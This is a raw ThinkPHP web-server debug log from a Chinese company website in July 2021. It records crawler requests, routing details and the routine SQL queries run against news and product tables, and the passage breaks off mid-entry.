2021-07-16T10:34:24+08:00 ] 49.7.21.118 GET /index/contanct/lxwm.html [ info ] www.kinsana.cn/index/contanct/lxwm.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,325.80kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T10:36:32+08:00 ] 49.7.21.119 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.031250s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T10:38:12+08:00 ] 118.184.177.112 GET / [ info ] www.kinsana.cn/ [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:2,015.91kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T10:56:28+08:00 ] 106.11.152.27 GET / [ info ] www.kinsana.cn/ [运行时间:0.156250s][吞吐率:6.40req/s] [内存消耗:2,016.47kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Mobile Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T10:56:38+08:00 ] 118.184.177.108 GET / [ info ] www.xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.02kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:04:07+08:00 ] 106.38.241.188 GET /index/contanct/zxly.html [ info ] www.kinsana.cn/index/contanct/zxly.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,325.84kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'zxly', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/zxly_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->zxly[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\zxly.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T11:06:59+08:00 ] 123.183.224.91 GET /index/zp/rczp.html [ info ] www.kinsana.cn/index/zp/rczp.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:1,960.57kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'zp', 2 => 'rczp', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/zp/rczp_html' => '', ) [ info ] [ RUN ] app\index\controller\Zp->rczp[ D:\WWW\kinsasa\application\index\controller\Zp.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\zp\rczp.htm [ array ( 0 => 'res', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `zp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `zp` WHERE `state` = 1 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:09:46+08:00 ] 72.13.46.6 GET / [ info ] xn--vhqsn14am88k.com/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,016.14kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip,deflate', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (compatible; ips-agent)', 'accept-language' => 'en-us,en;q=0.8', 'accept' => 'text/html,text/plain,*/*', 'from' => 'wc@verisign.com', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:09:49+08:00 ] 72.13.46.6 GET /index/about/qyjj.html [ info ] xn--vhqsn14am88k.com/index/about/qyjj.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,283.83kb] [文件加载:43] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'about', 2 => 'qyjj', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip,deflate', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (compatible; ips-agent)', 'accept-language' => 'en-us,en;q=0.8', 'accept' => 'text/html,text/plain,*/*', 'from' => 'wc@verisign.com', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/about/qyjj_html' => '', ) [ info ] [ RUN ] app\index\controller\About->qyjj[ D:\WWW\kinsasa\application\index\controller\About.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\about\qyjj.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T11:09:50+08:00 ] 72.13.46.6 GET /index/contanct/lxwm.html [ info ] xn--vhqsn14am88k.com/index/contanct/lxwm.html [运行时间:0.046875s][吞吐率:21.33req/s] [内存消耗:1,326.05kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'lxwm', ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'gzip,deflate', 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (compatible; ips-agent)', 'accept-language' => 'en-us,en;q=0.8', 'accept' => 'text/html,text/plain,*/*', 'from' => 'wc@verisign.com', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/contanct/lxwm_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->lxwm[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\lxwm.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T11:39:26+08:00 ] 118.184.177.54 GET /index/contanct/yfzx.html [ info ] www.kinsana.cn/index/contanct/yfzx.html [运行时间:0.078125s][吞吐率:12.80req/s] [内存消耗:1,325.81kb] [文件加载:45] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'contanct', 2 => 'yfzx', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/contanct/yfzx_html' => '', ) [ info ] [ RUN ] app\index\controller\Contanct->yfzx[ D:\WWW\kinsasa\application\index\controller\Contanct.php ] [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\contanct\yfzx.htm [ array ( ) ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T11:42:39+08:00 ] 118.184.177.101 GET /index/news/xwxq/id/8.html [ info ] www.kinsana.cn/index/news/xwxq/id/8.html [运行时间:0.093750s][吞吐率:10.67req/s] [内存消耗:2,173.52kb] [文件加载:55] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'news', 2 => 'xwxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0', 'accept-encoding' => 'gzip,deflate', 'accept-language' => 'zh-cn', 'accept' => '*/*', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/news/xwxq/id/8_html' => '', 'id' => '8', ) [ info ] [ RUN ] app\index\controller\News->xwxq[ D:\WWW\kinsasa\application\index\controller\News.php ] [ info ] [ DB ] INIT mysql [ info ] [ CACHE ] INIT File [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\news\xwxq.htm [ array ( 0 => 'res', 1 => 'fasts', 2 => 'nexts', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `news` WHERE `id` = 8 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] UPDATE `news` SET `pv`=`pv`+1 WHERE `id` = 8 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:49:47+08:00 ] 185.191.171.16 GET /index/product/jqyp.html [ info ] xn--vhqsn14am88k.com/index/product/jqyp.html [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,109.03kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'jqyp', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)', 'connection' => 'close', 'accept-encoding' => 'gzip,deflate', 'accept' => 'text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml, application/xhtml+xml', 'host' => 'xn--vhqsn14am88k.com', ) [ info ] [ PARAM ] array ( '/index/product/jqyp_html' => '', ) [ info ] [ RUN ] app\index\controller\Product->jqyp[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\jqyp.htm [ array ( 0 => 'res', 1 => 'page', 2 => 'types', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000000s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `product` WHERE `cate_id` = 1 AND `state` = 1 LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`type_id`,`name`,`pro_name`,`sp`,`sm_img` FROM `product` WHERE `cate_id` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 0,9 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `type_id` FROM `product` WHERE `cate_id` = 1 AND `state` = 1 GROUP BY `type_id` [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `type` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `type` WHERE `id` IN (1,3,5,8) [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:54:35+08:00 ] 54.36.149.99 GET / [ info ] www.kinsana.cn/ [运行时间:0.140625s][吞吐率:7.11req/s] [内存消耗:2,015.80kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-encoding' => 'deflate, gzip, br', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( ) [ info ] [ RUN ] app\index\controller\Index->index[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\index\index.htm [ array ( 0 => 'gsRes', 1 => 'hyRes', 2 => 'cate', 3 => 'hdp', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.031250s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `news` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '1' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SELECT `id`,`is_top`,`update_time`,`img`,`title`,`cate_id`,`state`,`dec`,`date` FROM `news` WHERE `cate_id` = '2' AND `state` = '1' ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 3 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `cate` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `cate` ORDER BY `sort` DESC [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `hdp` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `hdp` ORDER BY `id` ASC [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:54:43+08:00 ] 168.119.68.185 GET /ajaxArea.php?id=1000139 [ info ] www.kinsana.cn/ajaxArea.php?id=1000139 [运行时间:0.125000s][吞吐率:8.00req/s] [内存消耗:1,070.59kb] [文件加载:38] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'ajaxArea.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'accept' => '*/*', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/ajaxArea_php' => '', 'id' => '1000139', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2021-07-16T11:54:44+08:00 ] 168.119.68.185 POST /index/index/proapi.html [ info ] www.kinsana.cn/index/index/proapi.html [运行时间:0.062500s][吞吐率:16.00req/s] [内存消耗:1,904.95kb] [文件加载:49] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'index', 2 => 'proapi', ), ) [ info ] [ HEADER ] array ( 'cookie' => 'safedog-flow-item=', 'accept-language' => 'en-US', 'accept-encoding' => 'gzip, deflate', 'referer' => 'http://www.kinsana.cn/', 'origin' => 'http://www.kinsana.cn', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'user-agent' => 'Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)', 'x-requested-with' => 'XMLHttpRequest', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'cache-control' => 'no-cache', 'pragma' => 'no-cache', 'content-length' => '7', 'connection' => 'close', 'host' => 'www.kinsana.cn', ) [ info ] [ PARAM ] array ( '/index/index/proapi_html' => '', 'cates' => '5', ) [ info ] [ RUN ] app\index\controller\Index->proapi[ D:\WWW\kinsasa\application\index\controller\Index.php ] [ info ] [ DB ] INIT mysql [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT `id`,`cate_id`,`sm_img`,`name`,`pro_name`,`sp` FROM `product` WHERE `cate_id` = 5 AND `is_top` = 1 AND `state` = 1 ORDER BY `is_top` DESC,`update_time` DESC,`id` DESC LIMIT 4 [ RunTime:0.000000s ] --------------------------------------------------------------- [ 2021-07-16T11:56:01+08:00 ] 106.11.154.114 GET /index/product/cpxq/id/116.html [ info ] www.kinsana.cn/index/product/cpxq/id/116.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:1,987.84kb] [文件加载:52] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'index', 1 => 'product', 2 => 'cpxq', ), ) [ info ] [ HEADER ] array ( 'connection' => 'close', 'accept-language' => 'zh-CN,zh;q=0.9', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 YisouSpider/5.0 Safari/537.36', 'upgrade-insecure-requests' => '1', 'host' => 'www.kinsana.cn', 'accept-encoding' => 'gzip, deflate', ) [ info ] [ PARAM ] array ( '/index/product/cpxq/id/116_html' => '', 'id' => '116', ) [ info ] [ RUN ] app\index\controller\Product->cpxq[ D:\WWW\kinsasa\application\index\controller\Product.php ] [ info ] [ DB ] INIT mysql [ info ] [ VIEW ] D:\WWW\kinsasa\public/../application/index\view\product\cpxq.htm [ array ( 0 => 'res', 1 => 'photoRes', ) ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.015625s ] mysql:host=127.0.0.1;dbname=kinsana;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `product` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `product` `p` INNER JOIN `type` `t` ON `p`.`type_id`=`t`.`id` WHERE `p`.`id` = '116' LIMIT 1 [ RunTime:0.000000s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `goods_photo` [ RunTime:0.015625s ] [ sql ] [ SQL ] SELECT * FROM `goods_photo` WHERE `goods_id` = 116 [ RunTime:0.015625s ] --------------------------------------------------------------- [ 2021-07-16T12:07:45+08:00 ] 203.208.60.42 GET /index/product/zycp.html [ info ] www.kinsana.cn/index/product/zycp.html [运行时间:0.109375s][吞吐率:9.14req/s] [内存消耗:2,106.89kb] [文件加载:56] [ info ] [ LANG ] D:\WWW\kinsasa\thinkphp\lang\zh-cn.php [ info 